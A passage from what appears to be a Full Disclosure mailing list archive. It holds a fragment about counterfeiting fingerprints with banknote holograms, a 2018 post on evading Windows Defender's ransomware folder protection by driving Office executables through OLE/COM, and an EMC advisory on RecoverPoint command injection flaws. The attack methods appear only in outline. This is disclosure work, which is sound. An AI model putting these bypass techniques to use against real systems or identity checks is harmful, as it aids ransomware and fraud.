At that point people can as well use the hologram to authenticate for a
system or to a mobile device. In case of a user do not want to save his
personal fingerprint to any untrusted device. Then they can by now use the
hologram to save a fingerprint to authenticate the full anonym way.
8. Bypassing the biometric security with the help of banknotes

Spread Exposition Exploitation Detection
LOW MODERATE MODERATE EASY

Problem Description & Causes
Reference 1 has proved the biometric security of European bills for
counterfeiting a fingerprint in a PoC.

Possible threat scenarios
1. Avoiding person-related biometric backup in mobile devices, such as the
Apple iPhone, u.v.m.
2. If necessary Falsification of the biometric identifiers of identity
documents. Fake ID documents can be sold on the black market with a one
time registered fingerprint. The number of copies and persons is irrelevant.

Countermeasures:
1. Generate Awareness among Manufacturers and Users of Smart Meter
Biometrics.
2. Educate data feeders so that fingers are free of foreign matter (e.g.,
glue, or the like) and checked.
3. Organization

[FD] Microsoft Anti Ransomware mitigation bypass

2018-02-02 Thread Yago Jesus 
Hi,

Since Windows 10 Fall Creators Update, Microsoft added protection for
Ransomware in their product ‘Windows Defender’

By default, Office executables are included in the whitelist so these
programs could make changes in protected folders without restrictions.

This access level is granted even if a malicious user uses OLE/COM objects
to drive Office executables programmatically.

So a Ransomware developer could adapt their software to use OLE objects to
change / delete / encrypt files invisibly for the files owner.

More info with PoC code here (Also the surprising answer from Microsoft )
:
http://www.securitybydefault.com/2018/01/microsoft-anti-ransomware-bypass-not.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] ESA-2018-015: EMC RecoverPoint Command Injection Vulnerabilities

2018-02-02 Thread EMC Product Security Response Center 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

ESA-2018-015: EMC RecoverPoint Command Injection Vulnerabilities

EMC Identifier: ESA-2018-015
CVE Identifier: CVE-2018-1184, CVE-2018-1185
Severity Rating: See below for individual scores

Affected products:  
*   EMC RecoverPoint for Virtual Machines versions prior to 5.1.1
*   EMC RecoverPoint version 5.1.0.0
*   EMC RecoverPoint versions prior to 5.0.1.3

Summary:  
EMC RecoverPoint contains command injection vulnerabilities that could 
potentially be exploited by malicious users to compromise the affected systems. 

Details:  
EMC RecoverPoint is susceptible to the following command injection 
vulnerabilities:

*   Command injection vulnerability in Admin CLI may allow a malicious user 
with admin privileges to escape from the restricted shell to an interactive 
shell and run arbitrary commands with root privileges (CVE-2018-1185). 

CVSS v3 Base Score: 6.7 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

*   Command injection vulnerability in Boxmgmt CLI may allow a malicious 
user with boxmgmt privileges to bypass Boxmgmt CLI and run arbitrary commands 
with root privileges (CVE-2018-1184). 

CVSS v3 Base Score: 6.7 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

Resolution:  
The following EMC RecoverPoint releases contain resolutions to these 
vulnerabilities:
*   EMC RecoverPoint for Virtual Machines 5.1.1
*   EMC RecoverPoint for Virtual Machines 5.0.1.3
*   EMC RecoverPoint 5.1.0.1
*   EMC RecoverPoint 5.0.1.3
 
EMC recommends all customers upgrade to one of the above versions at the 
earliest opportunity. Customers are strongly advised to limit administrator 
privileges to trusted users and change default passwords to minimize the risk.  
See Security Configuration Guide for details.

Link to remedies:
Customers can download software from:  
https://support.emc.com/search/?text=RecoverPoint&searchLang=en_US&facetResource=DOWN

Credits:
EMC would like to thank Geoffrey Janjua, Mike Erman, Jack Backer, and Alexander 
Gonzalez from Northrop Grumman for reporting these vulnerabilities.


Read and use the information in this EMC Security Advisory to assist in 
avoiding any situation that might arise from the problems described herein. If 
you have any questions regarding this product alert, contact EMC Software 
Technical Support at 1-877-534-2867.

For an explanation of Severity Ratings, refer to EMC Knowledgebase solution 
emc218831. EMC recommends all customers take into account both the base score 
and any relevant temporal and environmental scores which may impact the 
potential severity associated with particular security vulnerability.

EMC recommends that all users determine the applicability of this information 
to their individual situations and take appropriate action. The information set 
forth herein is provided "as is" without warranty of any kind. EMC disclaims 
all warranties, either express or implied, including the warranties of 
merchantability, fitness for a particular purpose, title and non-infringement. 
In no event, shall EMC or its suppliers, be liable for any damages whatsoever 
including direct, indirect, incidental, consequential, loss of business profits 
or special damages, even if EMC or its suppliers have been advised of the 
possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for consequential or incidental damages, so the 
foregoing limitation may not apply.

-BEGIN PGP SIGNATURE-
Version: GnuPG v2

iQEcBAEBCAAGBQJacfuGAAoJEHbcu+fsE81ZXXEH/jmPlsfbucZdxcvxW69ICyeA
6xMF+iB0U9bp4xyE3tW07oxr/E0zXO5aDVEIvgwEzeuZ9d2rDVqqayO4nKLAP+34
YMlj+Zo36g3JL2HdaAxv4MwmoPgwTMVoWjmkW2eRUGx5HoBlLLxYsnpXxH+/7Nr5
9d5Vs0HdHXeQWYALUwhe6ypza8iUq2KJsJb4dkuHGzr66/qiOQuTCU+kMuWYfKqN
wKNk5jscd/EWEehXOeHFd2rRvAha/Gyt54Z6bqz1/VrsOtUkPjtOsavhFuuJMSdX
7fxFpE1GaeTmA0dX4LGjcf1o3cjuvfKoQR1JJiXHXjsKSNuoWdKSNYjnySfdyxA=
=BcQ/
-END PGP SIGNATURE-

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/